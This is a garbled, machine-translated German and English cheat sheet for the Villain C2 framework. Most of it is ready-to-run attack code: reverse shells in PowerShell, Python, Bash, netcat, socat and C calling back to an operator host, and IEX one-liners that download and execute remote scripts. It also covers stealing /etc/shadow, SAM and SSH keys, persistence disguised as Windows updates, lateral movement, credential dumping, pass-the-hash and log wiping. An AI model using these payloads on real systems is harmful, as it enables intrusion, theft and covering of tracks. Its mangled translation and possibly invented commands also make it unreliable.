Villain C2 Framework Cheat Sheet¶
Überblick¶
Villain ist ein High-Level-Stufe 0/1-Befehl und -Steuerung (C2)-Framework für die Verwaltung von Reverse Shells und Initial Access Operationen. Villain, in Python gebaut, konzentriert sich auf Einfachheit und Effektivität für früheste rote Team-Operationen, bietet eine intuitive Schnittstelle für die Verwaltung von mehreren reversen Shell-Verbindungen, PowerShell-Operationen und Multisession-Steuerung.
ZEIT Warnung: Dieses Tool ist nur für autorisierte Penetrationstests und rote Teamübungen gedacht. Stellen Sie sicher, dass Sie eine ordnungsgemäße Autorisierung vor der Verwendung gegen jedes Ziel haben.
Installation¶
Voraussetzungen¶
```bash
Install Python 3.8+ and pip¶
sudo apt update sudo apt install -y python3 python3-pip python3-venv git
Install system dependencies¶
sudo apt install -y build-essential libssl-dev libffi-dev python3-dev
Verify Python version¶
python3 --version ```_
Installation von GitHub¶
```bash
Clone Villain repository¶
git clone https://github.com/t3l3machus/Villain.git cd Villain
Create virtual environment¶
python3 -m venv villain-env source villain-env/bin/activate
Install requirements¶
pip install -r requirements.txt
Make executable¶
chmod +x Villain.py ```_
Docker Installation¶
```bash
Clone repository¶
git clone https://github.com/t3l3machus/Villain.git cd Villain
Build Docker image¶
docker build -t villain .
Run Villain container¶
docker run -it --rm -p 6969:6969 -p 8080:8080 villain
Run with persistent data¶
docker run -it --rm -p 6969:6969 -p 8080:8080 -v $(pwd)/data:/app/data villain ```_
Kali Linux Installation¶
```bash
Install from Kali repositories (if available)¶
sudo apt update sudo apt install villain
Or install from source¶
git clone https://github.com/t3l3machus/Villain.git cd Villain pip3 install -r requirements.txt ```_
Basisnutzung¶
Starting Villain¶
```bash
Start Villain with default settings¶
python3 Villain.py
Start with custom interface and port¶
python3 Villain.py -i 0.0.0.0 -p 6969
Start with SSL/TLS encryption¶
python3 Villain.py -i 0.0.0.0 -p 443 -c /path/to/cert.pem -k /path/to/key.pem
Start with custom teamserver password¶
python3 Villain.py -x MySecretPassword
Start in quiet mode¶
python3 Villain.py -q ```_
Kommandozeilenoptionen¶
```bash
Villain command line options¶
python3 Villain.py -h
Options: -i, --interface Interface to bind the teamserver (default: 127.0.0.1) -p, --port Port to bind the teamserver (default: 6969) -x, --teamserver-password Set teamserver password -c, --cert Path to SSL certificate file -k, --key Path to SSL private key file -q, --quiet Quiet mode (minimal output) -h, --help Show help message ```_
Web Interface Zugriff¶
```bash
Access Villain web interface¶
HTTPS access (if SSL configured)¶
Default credentials¶
No authentication by default¶
Use -x flag to set teamserver password¶
```_
Kernmerkmale¶
Sitzungsmanagement¶
```bash
List active sessions¶
sessions
Select session¶
sessions -i [session_id]
Session information¶
sessions -i [session_id] -info
Kill session¶
sessions -i [session_id] -k
Rename session¶
sessions -i [session_id] -n [new_name]
Background current session¶
background ```_
Hörer Management¶
```bash
Create HTTP listener¶
listeners -c http -p 8080
Create HTTPS listener¶
listeners -c https -p 443 -c /path/to/cert.pem -k /path/to/key.pem
Create reverse shell listener¶
listeners -c shell -p 4444
List active listeners¶
listeners
Kill listener¶
listeners -k [listener_id] ```_
Nutzlasterzeugung¶
```bash
Generate PowerShell payload¶
generate -t powershell -l [listener_id]
Generate Python payload¶
generate -t python -l [listener_id]
Generate Bash payload¶
generate -t bash -l [listener_id]
Generate Windows executable¶
generate -t exe -l [listener_id] -o payload.exe
Generate with obfuscation¶
generate -t powershell -l [listener_id] -o ```_
Reverse Shell Operationen¶
Grundlegende Shell Befehle¶
```bash
Execute system commands¶
shell whoami shell hostname shell pwd shell ls -la shell dir
Change directory¶
cd /path/to/directory cd C:\Windows\System32
File operations¶
cat /etc/passwd type C:\Windows\System32\drivers\etc\hosts download /path/to/file upload local_file remote_path ```_
PowerShell Operationen¶
```powershell
Execute PowerShell commands¶
powershell Get-Process powershell Get-Service powershell Get-ComputerInfo powershell Get-LocalUser powershell Get-LocalGroup
PowerShell one-liners¶
powershell "Get-WmiObject -Class Win32_ComputerSystem" powershell "Get-NetAdapter|Select-Object Name,InterfaceDescription,LinkSpeed" powershell "Get-Process|Where-Object \\{$_.ProcessName -like 'chrome'\\}"
Execute PowerShell scripts¶
powershell -File C:\Scripts\script.ps1 powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/script.ps1')" ```_
File Transfer Operationen¶
```bash
Download files from target¶
download C:\Users\Administrator\Documents\sensitive.docx download /etc/shadow download C:\Windows\System32\config\SAM
Upload files to target¶
upload payload.exe C:\Windows\Temp\update.exe upload script.sh /tmp/script.sh upload tool.py C:\Users\Public\tool.py
Bulk file operations¶
download C:\Users*\Documents*.docx download /home/*/.ssh/id_rsa ```_
Prozessmanagement¶
```bash
List processes¶
ps shell tasklist powershell Get-Process
Kill process¶
kill [pid] shell taskkill /PID [pid] /F powershell Stop-Process -Id [pid] -Force
Start process¶
shell start notepad.exe powershell Start-Process -FilePath "notepad.exe"
Process injection¶
inject [pid] [shellcode_file] ```_
Erweiterte Funktionen¶
Multi-Session Management¶
```bash
Interact with multiple sessions¶
sessions -a "whoami" # Execute on all sessions sessions -g [group] "hostname" # Execute on session group
Session grouping¶
sessions -i [session_id] -g [group_name]
Broadcast commands¶
broadcast "systeminfo" broadcast "Get-ComputerInfo"
Session synchronization¶
sync [session_id1] [session_id2] ```_
Persistenzmechanismen¶
```bash
Registry persistence¶
persistence registry -k "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" -v "WindowsUpdate" -p "C:\Windows\Temp\payload.exe"
Scheduled task persistence¶
persistence schtask -n "SystemUpdate" -p "C:\Windows\Temp\payload.exe" -t "ONLOGON"
Service persistence¶
persistence service -n "WindowsUpdateService" -p "C:\Windows\Temp\payload.exe"
Startup folder persistence¶
persistence startup -p "C:\Windows\Temp\payload.exe" ```_
Spätere Bewegung¶
```bash
WMI execution¶
wmi [target_ip] [username] [password] "whoami" wmi 192.168.1.100 administrator password123 "systeminfo"
PSExec-style execution¶
psexec [target_ip] [username] [password] [command] psexec 192.168.1.100 admin pass123 "powershell -c Get-Process"
PowerShell remoting¶
winrm [target_ip] [username] [password] [command] winrm 192.168.1.100 administrator password123 "Get-Service"
SSH execution (Linux targets)¶
ssh [target_ip] [username] [password] [command] ssh 192.168.1.50 root password123 "uname -a" ```_
Einrichtende Operationen¶
```bash
Dump credentials¶
creds dump creds mimikatz creds lsass
Credential storage¶
creds add -u [username] -p [password] -d [domain] -h [hash]
List stored credentials¶
creds list
Use credentials¶
creds use [cred_id]
Pass-the-hash¶
pth [username] [hash] [target] [command] ```_
Netzwerkaktivitäten¶
```bash
Port scanning¶
portscan [target] [ports] portscan 192.168.1.0/24 80,443,22,3389
Network discovery¶
discover [network] discover 192.168.1.0/24
Proxy operations¶
proxy start [port] proxy list proxy stop [proxy_id]
Tunneling¶
tunnel [local_port] [remote_host] [remote_port] ```_
Payload Generation und Bereitstellung¶
PowerShell Payloads¶
```powershell
Basic PowerShell reverse shell¶
$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100',4444); \(stream = \(client.GetStream(); [byte[]]\)bytes = 0..65535|%\\\\{0\\\\}; while((\)i = \(stream.Read(\)bytes, 0, $bytes.Length)) -ne 0)\\{ \(data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\)bytes,0, $i); $sendback = (iex $data 2>&1|Out-String ); $sendback2 = \(sendback + 'PS ' + (pwd).Path + '> '; \(sendbyte = ([text.encoding]::ASCII).GetBytes(\)sendback2); \(stream.Write(\)sendbyte,0,\)sendbyte.Length); $stream.Flush() \\}; $client.Close()
Obfuscated PowerShell payload¶
\(s='192.168.1.100';\)p=4444;\(c=New-Object System.Net.Sockets.TCPClient(\)s,\(p);\)st=\(c.GetStream();[byte[]]\)b=0..65535|%\\{0\\};while((\(i=\)st.Read(\(b,0,\)b.Length)) -ne 0)\\{\(d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString(\)b,0,\(i);\)sb=(iex \(d 2>&1|Out-String);\)sb2=\(sb+'PS '+(pwd).Path+'> ';\)sb=([text.encoding]::ASCII).GetBytes(\(sb2);\)st.Write(\(sb,0,\)sb.Length);\(st.Flush()\\\\};\)c.Close()
Base64 encoded payload¶
\(command = "powershell -enc " + [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes(\)payload)) ```_
Python Payloads¶
```python
!/usr/bin/env python3¶
Python reverse shell payload¶
import socket import subprocess import os import sys
def connect(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('192.168.1.100', 4444))
while True:
command = s.recv(1024).decode('utf-8')
if command.lower() == 'exit':
break
if command.startswith('cd '):
try:
os.chdir(command[3:])
s.send(b'Changed directory\n')
except:
s.send(b'Failed to change directory\n')
else:
try:
output = subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT)
s.send(output)
except:
s.send(b'Command failed\n')
s.close()
if name == 'main': connect() ```_
Bash Payloads¶
```bash
!/bin/bash¶
Bash reverse shell payload¶
exec 5<>/dev/tcp/192.168.1.100/4444 cat <&5|while read line; do $line 2>&5 >&5; done
Alternative bash payload¶
bash -i >& /dev/tcp/192.168.1.100/4444 0>&1
Netcat payload¶
nc -e /bin/bash 192.168.1.100 4444
Socat payload¶
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.1.100:4444 ```_
Binäre Payloads¶
```c // C reverse shell payload
include ¶
include ¶
include ¶
include ¶
include ¶
include ¶
include ¶
int main() \\{ int sockfd; struct sockaddr_in server_addr; char buffer[1024];
sockfd = socket(AF_INET, SOCK_STREAM, 0);
server_addr.sin_family = AF_INET;
server_addr.sin_port = htons(4444);
server_addr.sin_addr.s_addr = inet_addr("192.168.1.100");
connect(sockfd, (struct sockaddr*)&server_addr, sizeof(server_addr));
dup2(sockfd, 0);
dup2(sockfd, 1);
dup2(sockfd, 2);
execve("/bin/bash", NULL, NULL);
return 0;
\\}
// Compile: gcc -o payload payload.c ```_
Automatisierung und Schrift¶
Python Automation Script¶
```python
!/usr/bin/env python3¶
Villain automation script¶
import requests import json import time import websocket from threading import Thread
class VillainAPI: def init(self, host='127.0.0.1', port=6969, password=None): self.base_url = f"http://\\{host\\}:\\{port\\}" self.session = requests.Session() if password: self.authenticate(password)
def authenticate(self, password):
"""Authenticate with teamserver"""
auth_data = \\\\{'password': password\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/auth", json=auth_data)
return response.status_code == 200
def get_sessions(self):
"""Get active sessions"""
response = self.session.get(f"\\\\{self.base_url\\\\}/api/sessions")
return response.json()
def execute_command(self, session_id, command):
"""Execute command on session"""
cmd_data = \\\\{
'session_id': session_id,
'command': command
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/api/execute", json=cmd_data)
return response.json()
def upload_file(self, session_id, local_path, remote_path):
"""Upload file to session"""
with open(local_path, 'rb') as f:
files = \\\\{'file': f\\\\}
data = \\\\{
'session_id': session_id,
'remote_path': remote_path
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/api/upload",
files=files, data=data)
return response.json()
def download_file(self, session_id, remote_path, local_path):
"""Download file from session"""
data = \\\\{
'session_id': session_id,
'remote_path': remote_path
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/api/download", json=data)
if response.status_code == 200:
with open(local_path, 'wb') as f:
f.write(response.content)
return True
return False
def automated_recon(self, session_id):
"""Perform automated reconnaissance"""
commands = [
"whoami",
"hostname",
"pwd",
"ps aux" if self.is_linux_session(session_id) else "tasklist",
"ifconfig" if self.is_linux_session(session_id) else "ipconfig /all",
"netstat -an",
"uname -a" if self.is_linux_session(session_id) else "systeminfo"
]
results = []
for cmd in commands:
print(f"[+] Executing: \\\\{cmd\\\\}")
result = self.execute_command(session_id, cmd)
results.append(result)
time.sleep(2)
return results
def is_linux_session(self, session_id):
"""Check if session is Linux-based"""
result = self.execute_command(session_id, "uname")
return 'Linux' in result.get('output', '')
def establish_persistence(self, session_id):
"""Establish persistence on target"""
if self.is_linux_session(session_id):
# Linux persistence
commands = [
"echo '*/5 * * * * /tmp/payload'|crontab -",
"echo '/tmp/payload' >> ~/.bashrc",
"cp /tmp/payload /etc/init.d/update && chmod +x /etc/init.d/update"
]
else:
# Windows persistence
commands = [
'reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v "WindowsUpdate" /d "C:\\Windows\\Temp\\payload.exe"',
'schtasks /create /tn "SystemUpdate" /tr "C:\\Windows\\Temp\\payload.exe" /sc onlogon',
'sc create "WindowsUpdateService" binPath= "C:\\Windows\\Temp\\payload.exe" start= auto'
]
for cmd in commands:
print(f"[+] Establishing persistence: \\\\{cmd\\\\}")
self.execute_command(session_id, cmd)
time.sleep(3)
Usage example¶
def main(): villain = VillainAPI('192.168.1.100', 6969, 'MySecretPassword')
# Get active sessions
sessions = villain.get_sessions()
print(f"[+] Found \\\\{len(sessions)\\\\} active sessions")
for session in sessions:
session_id = session['id']
print(f"[+] Processing session: \\\\{session_id\\\\}")
# Perform reconnaissance
villain.automated_recon(session_id)
# Establish persistence
villain.establish_persistence(session_id)
# Download interesting files
if villain.is_linux_session(session_id):
villain.download_file(session_id, '/etc/passwd', f'passwd_\\\\{session_id\\\\}.txt')
villain.download_file(session_id, '/etc/shadow', f'shadow_\\\\{session_id\\\\}.txt')
else:
villain.download_file(session_id, 'C:\\Windows\\System32\\config\\SAM', f'SAM_\\\\{session_id\\\\}')
if name == "main": main() ```_
PowerShell Automation¶
```powershell
Villain PowerShell automation script¶
function Invoke-VillainAutomation \\{ param( [string]\(VillainServer = "192.168.1.100", [int]\)Port = 6969, [string]$Password = $null )
$baseUrl = "http://$VillainServer:$Port"
# Create web session
$session = New-Object Microsoft.PowerShell.Commands.WebRequestSession
# Authenticate if password provided
if ($Password) \\\\{
$authData = @\\\\{ password = $Password \\\\}|ConvertTo-Json
try \\\\{
$authResponse = Invoke-WebRequest -Uri "$baseUrl/auth" -Method POST -Body $authData -ContentType "application/json" -WebSession $session
\\\\}
catch \\\\{
Write-Error "Authentication failed: $_"
return
\\\\}
\\\\}
# Get active sessions
try \\\\{
$sessionsResponse = Invoke-WebRequest -Uri "$baseUrl/api/sessions" -WebSession $session
$sessions = $sessionsResponse.Content|ConvertFrom-Json
Write-Host "[+] Found $($sessions.Count) active sessions"
\\\\}
catch \\\\{
Write-Error "Failed to get sessions: $_"
return
\\\\}
# Process each session
foreach ($villainSession in $sessions) \\\\{
$sessionId = $villainSession.id
Write-Host "[+] Processing session: $sessionId"
# Reconnaissance commands
$commands = @(
"whoami",
"hostname",
"systeminfo",
"tasklist",
"ipconfig /all",
"netstat -an"
)
foreach ($cmd in $commands) \\\\{
$cmdData = @\\\\{
session_id = $sessionId
command = $cmd
\\\\}|ConvertTo-Json
try \\\\{
$cmdResponse = Invoke-WebRequest -Uri "$baseUrl/api/execute" -Method POST -Body $cmdData -ContentType "application/json" -WebSession $session
Write-Host "[+] Executed: $cmd"
Start-Sleep -Seconds 2
\\\\}
catch \\\\{
Write-Warning "Failed to execute command '$cmd': $_"
\\\\}
\\\\}
# Establish persistence
$persistenceCommands = @(
'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "WindowsUpdate" /d "C:\Windows\Temp\payload.exe"',
'schtasks /create /tn "SystemUpdate" /tr "C:\Windows\Temp\payload.exe" /sc onlogon'
)
foreach ($cmd in $persistenceCommands) \\\\{
$cmdData = @\\\\{
session_id = $sessionId
command = $cmd
\\\\}|ConvertTo-Json
try \\\\{
Invoke-WebRequest -Uri "$baseUrl/api/execute" -Method POST -Body $cmdData -ContentType "application/json" -WebSession $session
Write-Host "[+] Persistence established: $cmd"
Start-Sleep -Seconds 3
\\\\}
catch \\\\{
Write-Warning "Failed to establish persistence: $_"
\\\\}
\\\\}
\\\\}
\\}
Execute automation¶
Invoke-VillainAutomation -VillainServer "192.168.1.100" -Password "MySecretPassword" ```_
Bash Automation Script¶
```bash
!/bin/bash¶
Villain bash automation script¶
VILLAIN_SERVER="192.168.1.100" VILLAIN_PORT="6969" PASSWORD="MySecretPassword" BASE_URL="http://\(VILLAIN_SERVER:\)VILLAIN_PORT"
Function to execute API calls¶
api_call() \\{ local method=\(1 local endpoint=\)2 local data=$3
if [ -n "$data" ]; then
curl -s -X $method "$BASE_URL$endpoint" \
-H "Content-Type: application/json" \
-d "$data" \
-b cookies.txt -c cookies.txt
else
curl -s -X $method "$BASE_URL$endpoint" \
-b cookies.txt -c cookies.txt
fi
\\}
Authenticate¶
if [ -n "\(PASSWORD" ]; then echo "[+] Authenticating..." auth_data="\\\\{\"password\":\"\)PASSWORD\"\\}" api_call "POST" "/auth" "$auth_data" > /dev/null fi
Get active sessions¶
echo "[+] Getting active sessions..." sessions=\((api_call "GET" "/api/sessions") session_count=\)(echo "$sessions"|jq length) echo "[+] Found $session_count active sessions"
Process each session¶
echo "$sessions"|jq -r '.[].id'|while read session_id; do echo "[+] Processing session: $session_id"
# Reconnaissance commands
commands=("whoami" "hostname" "systeminfo" "tasklist" "ipconfig /all" "netstat -an")
for cmd in "$\\\\{commands[@]\\\\}"; do
echo "[+] Executing: $cmd"
cmd_data="\\\\{\"session_id\":\"$session_id\",\"command\":\"$cmd\"\\\\}"
api_call "POST" "/api/execute" "$cmd_data" > /dev/null
sleep 2
done
# Establish persistence
persistence_commands=(
'reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v "WindowsUpdate" /d "C:\\Windows\\Temp\\payload.exe"'
'schtasks /create /tn "SystemUpdate" /tr "C:\\Windows\\Temp\\payload.exe" /sc onlogon'
)
for cmd in "$\\\\{persistence_commands[@]\\\\}"; do
echo "[+] Establishing persistence: $cmd"
cmd_data="\\\\{\"session_id\":\"$session_id\",\"command\":\"$cmd\"\\\\}"
api_call "POST" "/api/execute" "$cmd_data" > /dev/null
sleep 3
done
done
Cleanup¶
rm -f cookies.txt echo "[+] Automation completed" ```_
Integration mit anderen Tools¶
Metasploit Integration¶
```bash
Use Villain for initial access, pivot to Metasploit¶
Generate Metasploit payload¶
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=8443 -f exe -o meterpreter.exe
Upload via Villain session¶
upload meterpreter.exe C:\Windows\Temp\update.exe
Execute Metasploit payload¶
shell C:\Windows\Temp\update.exe
Handle in Metasploit¶
msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_https set LHOST 192.168.1.100 set LPORT 8443 run ```_
Integrieren der Welt¶
```bash
Generate Empire stager¶
Use Villain for initial access, pivot to Empire¶
From Villain session¶
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/empire_stager.ps1')"
Handle in Empire¶
./empire listeners uselistener http set Host 192.168.1.100 set Port 8080 execute ```_
Cobalt Strike Integration¶
```bash
Beacon integration¶
Generate Cobalt Strike beacon¶
Use Villain for initial access, pivot to Beacon¶
From Villain session¶
powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/beacon.ps1')"
Handle in Cobalt Strike team server¶
```_
Operationelle Sicherheit¶
Kommunikationssicherheit¶
```bash
Use HTTPS with valid certificates¶
Configure domain fronting¶
Implement certificate pinning¶
Use legitimate user agents¶
Generate SSL certificates¶
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes
Start Villain with SSL¶
python3 Villain.py -i 0.0.0.0 -p 443 -c server.crt -k server.key ```_
Verkehrsobfukation¶
```bash
Use custom user agents¶
Implement jitter and delays¶
Mimic legitimate traffic patterns¶
Use common ports and protocols¶
Example obfuscated payload¶
powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& \\{Start-Sleep -Seconds (Get-Random -Minimum 5 -Maximum 30); IEX (New-Object Net.WebClient).DownloadString('https://legitimate-domain.com/update.ps1')\\}" ```_
Anti-Forensik¶
```bash
Clear event logs¶
wevtutil cl System wevtutil cl Security wevtutil cl Application
Clear PowerShell history¶
Remove-Item (Get-PSReadlineOption).HistorySavePath
Timestomping¶
powershell -c "$(Get-Item file.exe).LastWriteTime = '01/01/2020 12:00:00'" ```_
Fehlerbehebung¶
Gemeinsame Themen¶
```bash
Session not connecting¶
- Check firewall rules
- Verify listener configuration
- Test network connectivity
- Check antivirus interference
Python dependency issues¶
pip install --upgrade -r requirements.txt
SSL certificate issues¶
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes ```_
Debug Mode¶
```bash
Enable verbose logging¶
python3 Villain.py -v
Check network connectivity¶
telnet 192.168.1.100 6969
Test payload execution¶
python3 -c "import socket; s=socket.socket(); s.connect(('192.168.1.100', 4444))" ```_
Best Practices¶
Betriebsplanung¶
- **Pre-engagement Setup*: Hörer und Nutzlasten vor dem Eingriff konfigurieren
- Session Management: Verwenden Sie beschreibende Sitzungsnamen und Gruppierung
- ** Kommunikationsprotokolle*: Sichere C2-Kommunikationskanäle erstellen
- Datenhandling: Implementierung einer sicheren Datenerfassung und -speicherung
- **Cleanup-Verfahren*: Plan für Artefaktentfernung und Sitzungsreinigung
Sicherheitsüberlegungen¶
```bash
Secure deployment¶
Use strong teamserver passwords¶
Enable HTTPS with valid certificates¶
Implement network segmentation¶
Regular security updates¶
Session management¶
Use unique session identifiers¶
Implement session timeouts¶
Regular session rotation¶
Secure communication channels¶
```_
Dokumentation und Reporting¶
```bash
Operation documentation¶
Maintain session logs¶
Document all activities¶
Track compromised systems¶
Generate executive reports¶
Artifact tracking¶
Monitor IOCs¶
Document forensic artifacts¶
Implement attribution prevention¶
```_
Ressourcen¶
- [Villain GitHub Repository](LINK_5_
- (LINK_5_)
- (LINK_5)
- [MITRE ATT&CK Framework](LINK_5_
- (SANS Red Team Operations)(LINK_5)
--
*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von Villain C2 Rahmen. Stellen Sie immer sicher, dass Sie eine ordnungsgemäße Autorisierung vor der Durchführung von roten Team-Operationen oder Penetrationstests haben. *